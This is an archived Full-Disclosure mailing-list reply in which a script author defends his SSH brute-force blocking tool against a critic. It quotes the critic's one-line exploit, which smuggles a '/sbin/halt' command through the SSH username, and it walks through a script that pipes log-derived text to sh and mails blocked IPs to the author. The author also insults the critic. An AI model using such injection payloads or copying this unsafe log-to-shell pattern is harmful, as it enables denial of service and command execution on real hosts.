Re: [Full-disclosure] SSH brute force blocking tool

Tavis Ormandy wrote:

Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim


Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory)

if [ `whoami` != root ]

then echo "This script needs to run under the root user"
exit

else

if [ -e /tmp/hosts.deny ]

then
rm /tmp/hosts.deny
fi
/////

Check to see if the user is root. If not, tell the user "Hey dumbass, you
need to be root", if the user is root, continue.

/////
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny
diff /etc/hosts.deny /tmp/hosts.deny | awk '/\./ && />/{print $2}' >> /etc/hosts.deny
/////

There is no hocus pocus here. Look at /var/log/secure and fine the term
"error retrieving" and print the next line, 13th column. Then sort it and
print the unique entries into /tmp/hosts.deny. After you do this, compare
/tmp/hosts.deny with /etc/hosts.deny and put the differences not in /etc/hosts.deny
into /etc/hosts.deny

/////
OS=$( uname|sed -n '1p')
/////

This is a no brainer. No voodoo there.

# IPTables function...
ifaddr=`ifconfig -a|awk '/inet/ && !/inet6/ && !/127.0/ && !/192.168/{print $2}'|sed 's/addr\://g'`

Do an ifconfig on the machine. Ignore the word inet, inet6, 127.0, 192.168, print
the second field, and replace the term addr: with nothing. No voodoo here jackass.

/////
function IPT {

awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s -i/'|sh

}
/////

This is such a hacker thing coming now. You caught me.

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk hacking)

/////
if [ $OS = Linux ]

then
IPT

fi
/////

This is where I guess I hack the world. Check the OS and if it's Linux, then

cat /etc/hosts.deny

Ignore comments !/#/
print anything with a decimal /\./
make this unique !a[$0]++ (!a[$0]++ = uniq ... shhh don't expose my awk hacking)
then print iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22 -j REJECT
$1 = IP address
$ifaddr = IP address of the interface

/////
echo "Copying sharpener to /usr/local/bin"
sed -n '1,67p' ./sharpener > /usr/local/bin/sharpener
echo "fi" >> /usr/local/bin/sharpener
rm ./sharpener
/////

Here goes the voodoo... You ready?

print lines from 1 through 67 of this same file but put it in /usr/local/sharpener
add a fi to that same file then remove the original

/////
sleep 2
echo ""
echo "Adding Sharpener to cron"
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener"

if [ -e /var/spool/cron/root ]

then
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/spool/cron/root

else
if [ -e /var/cron/tabs/root ]

then
echo "0,10,20,30,40,50 * * * * /usr/local/bin/sharpener" >> /var/cron/tabs/root

fi
fi

/////

Add it to cron


/////

awk '!/192.168/ &&
!/127./ &&
!/#/ &&
!/172.32/{print $1" has been blocked via SSH"}' /etc/hosts.deny |\

mail -s "Sharpener" sharpener@xxxxxxxxxxxxxxx

fi
/////

Print out the first column of /etc/hosts.deny ... Ignore 127., ignore #, and ignore 172.32
then mail it to an evil hacker site so they can traverse telekinetically into your machine.

Right.

--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Problem in pkgmk while creating a Solaris package
    ... d osidp $/ 0755 root root ... d osidp $/include 0755 root root ... echo Kirti ...
    (comp.unix.solaris)
  • [UNIX] Apple Remote Desktop Privilege Escalation
    ... These commands can be run as root, because the ard administrator can be ... installer, use the lock screen feature in ARD. ... trap 'cd "$"' EXIT ... echo "This version of MacOS is not supported." ...
    (Securiteam)
  • Unix NOT secure against Viruses on home PCs
    ... because most users do not work as root. ... Sadly it is not really a big problem to spoof these logins. ... Just as a proof of concept I attached a simple "virus" code for bash based ... echo To uninfect myself I need root access. ...
    (comp.os.linux.security)
  • Re: Troubleshooting connection loss (novice question)
    ... If you are having to use windows to access Usenet: ... If you do not want some malware writting to linux. ... If using linux for usenet access, su - root, copy script text into xx ... echo "You need to be root to run $0" ...
    (comp.os.linux.networking)
  • Re: Problem with Cable Moden & Router.
    ... service avahi-daemon stop ... If having to use windows to access Usenet: ... If using linux for usenet access, su - root, copy script text into xx ... echo "You need to be root to run $0" ...
    (comp.os.linux.misc)